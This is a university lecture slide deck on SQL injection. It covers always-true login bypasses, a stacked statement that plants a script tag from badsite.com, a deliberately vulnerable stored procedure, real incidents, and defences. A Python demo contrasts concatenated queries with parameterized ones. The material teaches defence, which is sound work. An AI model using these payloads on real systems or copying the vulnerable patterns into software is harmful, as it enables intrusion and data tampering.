SQL Injection
Aaron Hill
IT 6873
Southern Polytechnic State University
What is it?

- A technique where individuals insert or append commands or code into a statement, altering the intent and actions of the resulting query
- Allows hackers to view, delete, or change data in a compromising way
Basic Examples

- Utilizing a statement that is always true
  - Entering a value into a field that will render a statement condition as always true (1=1 or ""="")
  - Resulting statement:

    SELECT field_name FROM table_name WHERE username = '' and 1=1 --'

- Appending another command through a terminating character (such as ;)
Types of Vulnerabilities

- Incorrect type handling
- Database server
- Blind injection
  - Conditional responses
  - Conditional errors
  - Time delays
Combinations

- SQL injection can be used in conjunction with XSS, malware, JavaScript, etc.
- In 2008, over 1 million websites were compromised by hybridized SQL injection attacks utilizing other components
Places of Concern

- SQL code
- HTML tags
- Stored procedures
HTML Tags

Here the injected input terminates the intended query with ; and appends a second statement that stores a script tag in the database, so the tag is later rendered to other users (the XSS combination from the Combinations slide); the trailing -- comments out the remainder of the original query:

```sql
SELECT FIRST_NAME, LAST_NAME FROM CUSTOMER WHERE USERNAME = '';
UPDATE TABLE CUSTOMER SET MIDDLE_NAME = '<script src=http://badsite.com>'; --'
```
Stored Procedures

A stored procedure is no protection when it builds its own statement from strings. This procedure concatenates the caller's input into the text it hands to EXECUTE, so a quote inside @custId changes the statement exactly as it would in application code:

```sql
CREATE PROCEDURE getOrdersByCustomerID @custId nvarchar(50) AS
    -- Vulnerable: @custId is spliced into the statement text instead of being bound as a parameter
    EXECUTE('SELECT OrderID FROM Sales WHERE CustomerID = ''' + @custId + '''');
```
Difficulties

- Obvious attacks
  - Structure deletion
  - Denial of service
  - Increased load on the system
- Covert attacks
  - Changes to data
  - Changes to code
Real World: Asprox

- Executable installed via phishing emails or through the network
- Searches Google for vulnerable ASP sites
- Downloads compromising JavaScript from direct84.com
- Attempts to download additional harmful JavaScript, Asprox copies, Trojan Danmec, and/or an SQL attack tool
Real World: Sony

- Hacked by LulzSec
- Attack on several of Sony's ventures, such as SonyPictures.com and music division servers
- LulzSec claimed the attack resulted from a single statement
- Purportedly, injection may have been involved in the PSN attack
Real World: Sun & MySQL

- TinKode and Ne0h compromised specific Sun domains
  - Obtained column names and email addresses in a table
- MySQL.com
  - Exposed metadata, account names, and passwords (both admin and blog)
  - Issue with Web coding, not the database
Real World: CyberVors

- Russian cyber criminal group
- Compromised 400,000+ servers and sites
- Approx. 1.2 billion usernames and passwords stolen
- Indiscriminate targeting of companies
- Utilized different hacking methods and several individuals and groups over several years
Preventative Measures

- Blacklisted words or characters
  - Not recommended
- Utilizing SQL parameters
- Validation controls and field classification
- Disallow error messages from revealing database metadata
- Johnny's Google Hacking Database
  - Johnny.ihackstuff.com/ghdb
Validation Samples

Sample 1: rejecting input that contains a quote character (the blacklist approach, which the previous slide marks as not recommended):

```csharp
if (UserID.Contains("'")) {
    // redirect to an error page
} else {
    // perform query action here
}
```
Validation Samples

Sample 2: converting the input to the expected type before it is used, so anything that is not a valid value of that type is rejected:

```csharp
try {
    // convert input to a value of the specified type
} catch {
    // redirect to error page
}
```
Validation Samples

Sample 3: a parameterized query; the value is bound to the placeholder by the database driver rather than spliced into the statement text, so it is always treated as data:

```csharp
string ID;   // the untrusted value read from the request
database.querytext = "SELECT ID FROM TABLENAME WHERE USERID = ?";
database.addParameter(ID);   // bound as a parameter, never concatenated into the statement
database.executeQuery();
```
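As an added example (not from the slides), the following Python code runs the "always true" fragment from the Basic Examples slide against the concatenated and the parameterized form of the same login query, and includes the quote check and type conversion of Validation Samples 1 and 2; the users table, its columns and the sample rows are constructed for this example.

```python
# Added example (not from the slides): the "always true" statement from slide 3
# and the three Validation Samples (slides 15-17) run against SQLite.
# Table name, column names and sample rows are constructed for this example.
import sqlite3

# Constructed sample data, not from the slides.
SAMPLE_USERS = [(1, "alice", "s3cret"), (2, "bob", "hunter2")]


def make_db():
    """Build an in-memory database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, username, password):
    """Vulnerable form: input is pasted into the statement text.

    A quote in the input closes the literal, so the slide-3 fragment
    "' and 1=1 --" becomes part of the WHERE clause and the trailing
    "--" comments out the password check that follows it.
    """
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_param(conn, username, password):
    """Slide 17: placeholders instead of concatenation.

    The driver sends the values separately from the statement, so the
    same input is compared as a literal string and matches nothing.
    """
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def contains_quote(value):
    """Slide 15: reject input containing a single quote.

    The slide itself marks character blacklisting as not recommended; it is
    included only to contrast with parameters, which need no such list.
    """
    return "'" in value


def user_by_id(conn, raw_id):
    """Slide 16: convert input to the expected type before it reaches SQL.

    Anything that is not an integer raises and is rejected (the slide's
    'redirect to error page'); the converted value is then bound as a
    parameter, so only a number can ever reach the database.
    """
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT username FROM users WHERE id = ?",
                       (user_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "alice' and 1=1 --"               # the fragment shown on slide 3
    print(login_concat(db, payload, "wrong"))   # ['alice']: password check commented out
    print(login_param(db, payload, "wrong"))    # []: the input is treated as data
    print(contains_quote(payload))              # True
    print(user_by_id(db, "1"), user_by_id(db, "1 or 1=1"))   # alice None
```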
Follow-up Questions

- What tools or techniques can be used to determine vulnerabilities within a system for SQLi?
- Have you had to reassess code to prevent SQLi vulnerabilities? If so, please elaborate.
- What are some other modern cases involving SQLi?
References & Readings

- Arthur, C. (2014). LulzSec hacker arrested over Sony attack. Retrieved from http://www.theguardian.com/technology/2012/aug/29/lulzsec-hacker-arrest-sony-attack
- Databases vulnerable to SQL injections. (2008). Data Strategy, 3(12), 6.
- Dorai, R., & Kannan, V. (2011). SQL Injection - Database Attack Revolution and Prevention. Journal of International Commercial Law & Technology, 6(4), 224-231.
- International Business, T. (0006, July). Post-PSN hack: Sony apologise at E3 as LulzSec mount fresh attack. International Business Times.
- Kirk, J. (2013). Asprox botnet proves to be a resilient foe. CIO (13284045), 8.
- Lemos, R. (2014). Russian Cyber-Gang Gathers 1.2B Login Credentials Via Website Flaws. eWeek, 7.
- OWASP. (2014). SQL Injection. Retrieved from https://www.owasp.org/index.php/SQL_Injection
- Prince, B. (2008). Botnet installs SQL injection tool. eWeek, 25(16), 21.
- Sullivan, B., & Liu, V. (2012). Web Application Security: A Beginner's Guide. New York, NY: McGraw-Hill Companies.
- Sun.com, MySQL.com Hacked, SQL Injection Attack. (2011). Channel Insider, 1.
- W3Schools. (2014). SQL injection. Retrieved from http://www.w3schools.com/sql/sql_injection.asp


Editor's Notes

1. Can include SQL or HTML modifications
2. May 2011
3. Controls at application or web level